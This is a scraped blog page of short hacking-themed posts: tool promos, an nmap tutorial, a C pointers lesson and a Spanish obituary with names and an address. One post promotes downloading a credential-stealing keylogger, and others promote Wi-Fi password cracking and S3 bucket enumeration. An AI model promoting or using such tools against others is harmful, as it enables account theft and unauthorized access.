Tuesday, 30 June 2020

Necrológicas

Falleció Elida Rosa Stangafero, tenía 50 años, vivía en calle 325 al 1446.
Madre: Ines Beatriz Zari.
Hermanos: Dario, Daniel, Jorge, Néstor, Vilma, Delia, Silvia y María.
Sin velatorio.
Sepelio: Lunes 29 de junio de 2020 a las 11:00 hs. en cementerio de Avellaneda.

Falleció Luisa Prota Trindade, tenía 77 años, vivía en barrio Carmen Luisa.
Hijos: José, Juan, Mercedes, Amanda, Rosana, Ángela, (Ramón y Miguel fdos.).
Sin velatorio.
Sepelio: domingo 28 de jun io de 2020 a las 9:00 hs. en cementerio de Reconquista. 

Envía tu noticia al WhatsApp 15-685798 – Súmate a la FanPage: ReconquistaNoticias.com
Read more
Read More :- "Necrológicas"
Posted by at 0 comments

Top 11 Websites to Learn How to Hack Like a Pro 2018

  1. SecTools.Org: List of 75 security tools based on a 2003 vote by hackers.
  2. HackRead: HackRead is a News Platform that centers on InfoSec, Cyber Crime, Privacy, Surveillance, and Hacking News with full-scale reviews on Social Media Platforms.
  3. The Hacker News: The Hacker News — most trusted and widely-acknowledged online cyber security news magazine with in-depth technical coverage for cybersecurity.
  4. NFOHump: Offers up-to-date .NFO files and reviews on the latest pirate software releases.
  5. Hacked Gadgets: A resource for DIY project documentation as well as general gadget and technology news.
  6. Metasploit: Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit. Get the worlds best penetration testing software now.
  7. Exploit DB: An archive of exploits and vulnerable software by Offensive Security. The site collects exploits from submissions and mailing lists and concentrates them in a single database.
  8. Hakin9: E-magazine offering in-depth looks at both attack and defense techniques and concentrates on difficult technical issues.
  9. Packet Storm: Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers.
  10. KitPloit: Leading source of Security Tools, Hacking Tools, CyberSecurity and Network Security.
  11. Phrack Magazine: Digital hacking magazine.
Read More :- "Top 11 Websites to Learn How to Hack Like a Pro 2018"
Posted by at 0 comments

Thursday, 11 June 2020

SigPloit SS7 Tool

Read More :- "SigPloit SS7 Tool"
Posted by at 0 comments

Wednesday, 10 June 2020

DOWNLOAD COWPATTY WIFI PASSOWORD CRACKING TOOL

COWPATTY WIFI PASSWORD CRACKING TOOL

CoWPAtty is a wifi password cracking tool. Implementation of a dictionary attack against WPA/WPA2 networks using PSK-based authentication (e.g. WPA-Personal). Many enterprise networks deploy PSK-based authentication mechanisms for WPA/WPA2 since it is much easier than establishing the necessary RADIUS, supplicant and certificate authority architecture needed for WPA-Enterprise authentication. Cowpatty can implement an accelerated attack if a precomputed PMK file is available for the SSID that is being assessed. Download coWPAtty wifi password cracking tool.
It's a pre-built tool for Kali Linux which you can find in the /usr/local/bin directory. It's also available for the windows but it doesn't work as fine as it does in the Kali.

DOWNLOAD COWPATTY WIFI PASSWORD CRACKING TOOL

For windows, you can download it from here. As it becomes pre-built in Kali, you do not need to download it. You just have to follow the path /usr/local/bin directory to find it in your Kali Linux OS.
Continue reading
Read More :- "DOWNLOAD COWPATTY WIFI PASSOWORD CRACKING TOOL"
Posted by at 0 comments

goGetBucket - A Penetration Testing Tool To Enumerate And Analyse Amazon S3 Buckets Owned By A Domain


When performing a recon on a domain - understanding assets they own is very important. AWS S3 bucket permissions have been confused time and time again, and have allowed for the exposure of sensitive material.

What this tool does, is enumerate S3 bucket names using common patterns I have identified during my time bug hunting and pentesting. Permutations are supported on a root domain name using a custom wordlist. I highly recommend the one packaged within AltDNS.

The following information about every bucket found to exist will be returned:
  • List Permission
  • Write Permission
  • Region the Bucket exists in
  • If the bucket has all access disabled

Installation
go get -u github.com/glen-mac/goGetBucket

Usage
goGetBucket -m ~/tools/altdns/words.txt -d <domain> -o <output> -i <wordlist>
Usage of ./goGetBucket:
  -d string
        Supplied domain name (used with mutation flag)
  -f string
        Path to a testfile (default "/tmp/test.file")
  -i string
        Path to input wordlist to enumerate
  -k string
        Keyword list (used with mutation flag)
  -m string
        Path to mutation wordlist (requires domain flag)
  -o string
        Path to output file to store log
  -t int
        Number of concurrent threads (default 100)
Throughout my use of the tool, I have produced the best results when I feed in a list (-i) of subdomains for a root domain I am interested in. E.G:
www.domain.com
mail.domain.com
dev.domain.com
The test file (-f) is a file that the script will attempt to store in the bucket to test write permissions. So maybe store your contact information and a warning message if this is performed during a bounty?
The keyword list (-k) is concatenated with the root domain name (-d) and the domain without the TLD to permutate using the supplied permuation wordlist (-m).
Be sure not to increase the threads too high (-t) - as the AWS has API rate limiting that will kick in and start giving an undesired return code.

Continue reading
Read More :- "goGetBucket - A Penetration Testing Tool To Enumerate And Analyse Amazon S3 Buckets Owned By A Domain"
Posted by at 0 comments

DOWNLOAD BLACK STEALER V2.1 FULL

BLACK STEALER V2.1 FULL

Black Stealer v2.1 is an advanced keylogger that can steal even saved passwords from the browsers and sends through Email and FTP. It's really easy to the crypt. Keylogger is a computer program that is a type of surveillance technology used to monitor and record each keystroke typed on a specific computer's keyboard by the user, especially in order to gain unauthorized access to the passwords and other confidential information. It's also called a keystroke logger or system monitor. Download black stealer v2.1 full.

DOWNLOAD BLACK STEALER V2.1 FULL

Related word
Read More :- "DOWNLOAD BLACK STEALER V2.1 FULL"
Posted by at 0 comments

Intel CPUs Vulnerable To New 'SGAxe' And 'CrossTalk' Side-Channel Attacks

Cybersecurity researchers have discovered two distinct attacks that could be exploited against modern Intel processors to leak sensitive information from the CPU's trusted execution environments (TEE). Called SGAxe, the first of the flaws is an evolution of the previously uncovered CacheOut attack (CVE-2020-0549) earlier this year that allows an attacker to retrieve the contents from the CPU's

via The Hacker News
This article is the property of Tenochtitlan Offensive Security. Verlo Completo --> https://tenochtitlan-sec.blogspot.com

Related links


  1. Pentest App
  2. Hacking Growth
  3. Hacking Simulator
  4. Pentest Owasp Top 10
  5. Hacker Computer
  6. Hacker News
  7. Hacker Computer
  8. Pentest Hardware
  9. Pentest Vpn
  10. Hacker Prank
  11. Hacking 3Ds
  12. Pentest Documentation
  13. Hacking Tools
Read More :- "Intel CPUs Vulnerable To New 'SGAxe' And 'CrossTalk' Side-Channel Attacks"
Posted by at 0 comments

CEH: Identifying Services & Scanning Ports | Gathering Network And Host Information | NMAP


CEH scanning methodology is the important step i.e. scanning for open ports over a network. Port is the technique used to scan for open ports. This methodology performed for the observation of the open and close ports running on the targeted machine. Port scanning gathered a valuable information about  the host and the weakness of the system more than ping sweep.

Network Mapping (NMAP)

Basically NMAP stands for Network Mapping. A free open source tool used for scanning ports, service detection, operating system detection and IP address detection of the targeted machine. Moreover, it performs a quick and efficient scanning a large number of machines in a single session to gathered information about ports and system connected to the network. It can be used over UNIX, LINUX and Windows.

There are some terminologies which we should understand directly whenever we heard like Open ports, Filtered ports and Unfiltered ports.

Open Ports means the target machine accepts incoming request on that port cause these ports are used to accept packets due to the configuration of TCP and UDP.

Filtered ports means the ports are usually opened but due to firewall or network filtering the nmap doesn't detect the open ports.

Unfiltered means the nmap is unable to determine whether the port is open or filtered  while the port is accessible.

Types Of NMAP Scan


Scan TypeDescription
Null Scan This scan is performed by both an ethical hackers and black hat hackers. This scan is used to identify the TCP port whether it is open or closed. Moreover, it only works over UNIX  based systems.
TCP connectThe attacker makes a full TCP connection to the target system. There's an opportunity to connect the specifically port which you want to connect with. SYN/ACK signal observed for open ports while RST/ACK signal observed for closed ports.
ACK scanDiscovering the state of firewall with the help ACK scan whether it is stateful or stateless. This scan is typically used for the detection of filtered ports if ports are filtered. Moreover, it only works over the UNIX based systems.
Windows scanThis type of scan is similar to the ACK scan but there is ability to detect an open ports as well filtered ports.
SYN stealth scanThis malicious attack is mostly performed by attacker to detect the communication ports without making full connection to the network.
This is also known as half-open scanning. 

 

All NMAP Commands 


CommandsScan Performed
-sTTCP connect scan
-sSSYN scan
-sFFIN scan
-sXXMAS tree scan
-sNNull scan
-sPPing scan
-sUUDP scan
-sOProtocol scan
-sAACK scan
-sWWindow scan
-sRRPC scan
-sLList/DNS scan
-sIIdle scan
-PoDon't ping
-PTTCP ping
-PSSYN ping
-PIICMP ping
-PBICMP and TCP ping
-PBICMP timestamp
-PMICMP netmask
-oNNormal output
-oXXML output
-oGGreppable output
-oAAll output
-T ParanoidSerial scan; 300 sec between scans
-T SneakySerial scan; 15 sec between scans
-T PoliteSerial scan; .4 sec between scans
-T NormalParallel scan
-T AggressiveParallel scan, 300 sec timeout, and 1.25 sec/probe
-T InsaneParallel scan, 75 sec timeout, and .3 sec/probe

 

How to Scan

You can perform nmap scanning over the windows command prompt followed by the syntax below. For example, If you wanna scan the host with the IP address 192.168.2.1 using a TCP connect scan type, enter this command:

nmap 192.168.2.1 –sT

nmap -sT 192.168.2.1

Related posts
  1. Pentest Practice
  2. Hacking Ethics
  3. Pentest Framework
  4. Pentest Practice Sites
  5. Pentest Training
  6. Pentest Blog
  7. Pentest Gear
  8. Pentest Smtp
  9. Hacker Types
  10. Pentest Environment
  11. Hacking Quotes
  12. Pentest Security
  13. Pentest Services
Read More :- "CEH: Identifying Services & Scanning Ports | Gathering Network And Host Information | NMAP"
Posted by at 0 comments

Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019

The OWASP Foundation would like to thank the OWASP Las Vegas Chapter Volunteers for taking the time out of their busy schedule to give back and volunteer to work the booth at BlackHat 2019.  It was great meeting our Las Vegas OWASP members and working with Jorge, Carmi, Dave, and Nancy.  
Also, take a moment to thank Global Board Members Martin Knobloch, Owen Pendlebury, and Gary Robinson for also working the booth and speaking with individuals and groups to answer questions on projects and suggestions on the use of our tools to address their work problems.
OWASP can not exist without support from our members.  

Related news


  1. Hacking Browser
  2. Hacking Wifi
  3. Hacker Types
  4. Pentest With Kali
  5. Hackerrank Sql
  6. Hacking Names
  7. Pentest Wiki
  8. Pentest Android App
  9. Pentest Ubuntu
  10. Pentest Os
  11. Pentest Lab Setup
  12. Pentesting Tools
  13. Pentest Tools Free
  14. Pentest Dns
  15. Pentest Vpn
  16. Pentest Website
  17. Hacker Keyboard
  18. Hacker Attack
  19. Pentest Red Team
  20. Pentest Red Team
Read More :- "Thank You To Volunteers And Board Members That Worked BlackHat Booth 2019"
Posted by at 0 comments

Sslmerge - Tool To Help You Build A Valid SSL Certificate Chain From The Root Certificate To The End-User Certificate


Is an open source tool to help you build a valid SSL certificate chain from the root certificate to the end-user certificate. Also can help you fix the incomplete certificate chain and download all missing CA certificates.

How To Use
It's simple:
# Clone this repository
git clone https://github.com/trimstray/sslmerge

# Go into the repository
cd sslmerge

# Install
./setup.sh install

# Run the app
sslmerge -i /data/certs -o /data/certs/chain.crt
  • symlink to bin/sslmerge is placed in /usr/local/bin
  • man page is placed in /usr/local/man/man8

Parameters
Provides the following options:
  Usage:
    sslmerge <option|long-option>

  Examples:
    sslmerge --in Root.crt --in Intermediate1.crt --in Server.crt --out bundle_chain_certs.crt
    sslmerge --in /tmp/certs --out bundle_chain_certs.crt --with-root
    sslmerge -i Server.crt -o bundle_chain_certs.crt

  Options:
        --help        show this message
        --debug       displays information on the screen (debug mode)
    -i, --in          add certificates to merge (certificate file, multiple files or directory with ssl certificates)
    -o, --out         saves the result (chain) to file
        --with-root   add root certificate to the certificate chain

How it works
Let's start with ssllabs certificate chain. They are delivered together with the sslmerge and can be found in the example/ssllabs.com directory which additionally contains the all directory (containing all the certificates needed to assemble the chain) and the server_certificate directory (containing only the server certificate).
The correct chain for the ssllabs.com domain (the result of the openssl command):
Certificate chain
 0 s:/C=US/ST=California/L=Redwood City/O=Qualys, Inc./CN=ssllabs.com
   i:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust Certification Authority - L1K
 1 s:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2012 Entrust, Inc. - for authorized use only/CN=Entrust Certification Authority - L1K
   i:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2009 Entrust, Inc. - for authorized use only/CN=Entrust Root Certification Authority - G2
 2 s:/C=US/O=Entrust, Inc./OU=See www.entrust.net/legal-terms/OU=(c) 2009 Entrust, Inc. - for authorized use only/CN=Entrust Root Certification Authority - G2
   i:/C=US/O=Entrust, Inc./OU=www.entrust.net/CPS is incorporated by reference/OU=(c) 2006 Entrust, Inc./CN=Entrust Root Certification Authority
The above code presents a full chain consisting of:
  • Identity Certificate (Server Certificate)
    issued for ssllabs.com by Entrust Certification Authority - L1K
  • Intermediate Certificate
    issued for Entrust Certification Authority - L1K by Entrust Root Certification Authority - G2
  • Intermediate Certificate
    issued for Entrust Root Certification Authority - G2 by Entrust Root Certification Authority
  • Root Certificate (Self-Signed Certificate)
    issued for Entrust Root Certification Authority by Entrust Root Certification Authority

Scenario 1
In this scenario, we will chain all delivered certificates. Example of running the tool:

Scenario 2
In this scenario, we only use the server certificate and use it to retrieve the remaining required certificates. Then, as above, we will combine all the provided certificates. Example of running the tool:

Certificate chain
In order to create a valid chain, you must provide the tool with all the necessary certificates. It will be:
  • Server Certificate
  • Intermediate CAs and Root CAs
This is very important because without it you will not be able to determine the beginning and end of the chain.
However, if you look inside the generated chain after generating with sslmerge, you will not find the root certificate there. Why?
Because self-signed root certificates need not/should not be included in web server configuration. They serve no purpose (clients will always ignore them) and they incur a slight performance (latency) penalty because they increase the size of the SSL handshake.
If you want to add a root certificate to the certificate chain, call the utility with the --with-root parameter.

Certification Paths
Sslmerge allows use of two certification paths:

Output comments
When generating the chain of certificates, sslmerge displays comments with information about certificates, including any errors.
Here is a list of all possibilities:

not found identity (end-user, server) certificate
The message is displayed in the absence of a server certificate that is the beginning of the chain. This is a unique case because in this situation the sslmerge ends its operation displaying only this information. The server certificate is the only certificate required to correctly create a chain. Without this certificate, the correct chain will not be created.

found correct identity (end-user, server) certificate
The reverse situation here - message displayed when a valid server certificate is found.

not found first intermediate certificate
This message appears when the first of the two intermediate certificates is not found. This information does not explicitly specify the absence of a second intermediate certificate and on the other hand it allows to determine whether the intermediate certificate to which the server certificate was signed exists. Additionally, it can be displayed if the second intermediate certificate has been delivered.

not found second intermediate certificate
Similar to the above, however, it concerns the second intermediate certificate. However, it is possible to create the chain correctly using the second certification path, e.g. using the first intermediate certificate and replacing the second with the main certificate.

one or more intermediate certificate not found
This message means that one or all of the required intermediate certificates are missing and displayed in the absence of the root certificate.

found 'n' correct intermediate certificate(s)
This message indicates the number of valid intermediate certificates.

not found correct root certificate
The lack of the root certificate is treated as a warning. Of course, when configuring certificates on the server side, it is not recommended to attach a root certificate, but if you create it with the sslmerge, it treats the chain as incomplete displaying information about the incorrect creation of the chain.

an empty CN field was found in one of the certificates
This message does not inform about the error and about the lack of the CN field what can happen with some certificates (look at example/google.com). Common Name field identifies the host name associated with the certificate. There is no requirement in RFC3280 for an Issuer DN to have a CN. Most CAs do include a CN in the Issuer DN, but some don't, such as this Equifax CA.

Requirements
Sslmerge uses external utilities to be installed before running:

Other

Contributing
See this.

Project architecture
See this.


More info
  1. Pentest
  2. Hacking Lab
  3. Hackerx
  4. Hacker Forum
  5. Hacking With Raspberry Pi
  6. Hacker Prank
  7. Pentest Network
  8. Pentest Process
  9. Pentest Training
  10. Pentest Ftp
  11. Hacking Gif
Read More :- "Sslmerge - Tool To Help You Build A Valid SSL Certificate Chain From The Root Certificate To The End-User Certificate"
Posted by at 0 comments

Pointers Part 1: The Basics



So you're eager to learn about pointers but unfortunately you got stuck because they seemed to you terrible in nature? That's not true I know, but many of the people get confused when they arrive at the topic of pointers. Well pointers are the most important tools in C programming and are the one that can make you fly (unless you don't know how to ride over them). In this article we're going to learn basics of pointers.
Pointers are the varaibles that store addresses of other variables. Easy ain't it?
So lets start with the decleration of a pointer, pointer is decreleared as:
data_type *var_name;
e,g
int *pt;
well the astrisk(*) before the variable name is the thing that makes variable a pointer. So far so good now what?
Now lets say we want to store address of a variable in our pointer variable that seems pretty complex..!
Let's do it:
int number = 100;
int *pt = &num;
Is it really complex..?
what we are doing here is that we are first declaring and initializing a integer variable (number) with value of 100 and then we declare and initialize a pointer variable (pt) with the address of number variable. Now pt (pointer variable) contains the address of number (integer varaible). So what? Now we can use this pointer variable to change the value of number variable. Is this some kind of Magic? Maybe. Lets' do it:
*pt = 200;
what we have done here is that we De-referencing the pt variable with the asterisk (*) and then assigned it the value of 200 now the number variable contains 200. Isn't it a magic? De-referencing is used for accessing the value of the variable towards which our pointer is pointing simple. So lets write a full program of what we have learned so far.
/*Pointer Basics: Creating and Using Pointers*/
#include<stdio.h>
int main(void){
  int number = 100;
  int *pt = &number;
  printf("Value of 'number' is: %d", number);
  printf("Address of 'number' is: %p", pt);
  *pt = 200;
  printf("New value of 'number' is: %d", number);
  return 0;
}
What this whole program did was it created a integer variable and a pointer to integer variable and then printed out the value and address of the 'number' variable and after that we De-referenced the pointer variable so that we can access the value to which our pointer variable is pointing and changed the old 100 value with new 200 value and at last we printed that out. Easy isn't it?
But do you know that you can get the address of a variable even by using ampersand (&) operator? Lemme show you how. I'll declare and initialize a variable 'var' and then print it to screen using ampersand (&) operator:
int var = 10;
printf("Address of 'var' is %p\n", &var);
the last statement here will print out the address of 'var' not value so that means it is equal to this statement:
int *pt = &var;
printf("Address of 'var' is %p\n", pt);
here we first assigned the address of 'var' to pointer variable 'pt' and then printed out the address of 'var' using the pointer variable (pt).
So lets write another program that will wrap up this part of 'Pointer Basics':
/*Pointer Basics Part 1: Program 2*/
#include<stdio.h>
int main(void){
   int var = 10;
   int *pt = &var;
   printf("The Value of 'var' is: %d\n", var);
   printf("De-referencing: *pt = %d\n", *pt);
   printf("Ampersand: The Address of 'var' is %p\n",  &var);
   printf("pt = %p\n", pt);
   return 0;
}
So that's the end of first part watch out for the next part in which we'll tighten our grip on pointers and get ready for some Advanced '*po(inter)-fo'.
Related news

Read More :- "Pointers Part 1: The Basics"
Posted by at 0 comments

How To Start | How To Become An Ethical Hacker

Are you tired of reading endless news stories about ethical hacking and not really knowing what that means? Let's change that!
This Post is for the people that:

  • Have No Experience With Cybersecurity (Ethical Hacking)
  • Have Limited Experience.
  • Those That Just Can't Get A Break


OK, let's dive into the post and suggest some ways that you can get ahead in Cybersecurity.
I receive many messages on how to become a hacker. "I'm a beginner in hacking, how should I start?" or "I want to be able to hack my friend's Facebook account" are some of the more frequent queries. Hacking is a skill. And you must remember that if you want to learn hacking solely for the fun of hacking into your friend's Facebook account or email, things will not work out for you. You should decide to learn hacking because of your fascination for technology and your desire to be an expert in computer systems. Its time to change the color of your hat 😀

 I've had my good share of Hats. Black, white or sometimes a blackish shade of grey. The darker it gets, the more fun you have.

If you have no experience don't worry. We ALL had to start somewhere, and we ALL needed help to get where we are today. No one is an island and no one is born with all the necessary skills. Period.OK, so you have zero experience and limited skills…my advice in this instance is that you teach yourself some absolute fundamentals.
Let's get this party started.
  •  What is hacking?
Hacking is identifying weakness and vulnerabilities of some system and gaining access with it.
Hacker gets unauthorized access by targeting system while ethical hacker have an official permission in a lawful and legitimate manner to assess the security posture of a target system(s)

 There's some types of hackers, a bit of "terminology".
White hat — ethical hacker.
Black hat — classical hacker, get unauthorized access.
Grey hat — person who gets unauthorized access but reveals the weaknesses to the company.
Script kiddie — person with no technical skills just used pre-made tools.
Hacktivist — person who hacks for some idea and leaves some messages. For example strike against copyright.
  •  Skills required to become ethical hacker.
  1. Curosity anf exploration
  2. Operating System
  3. Fundamentals of Networking
*Note this sites





Related links
  1. Pentest Vs Ceh
  2. Hacking Resources
  3. Pentest Aws
  4. Hacking Box
  5. Pentest Report Generator
  6. Hacking With Linux
  7. Pentest Cyber Security
  8. Is Hacking Illegal
  9. Pentest+ Vs Oscp
  10. Pentest Wifi
  11. Pentest Tools
  12. Hacker Code
Read More :- "How To Start | How To Become An Ethical Hacker"
Posted by at 0 comments
Subscribe to: Posts (Atom)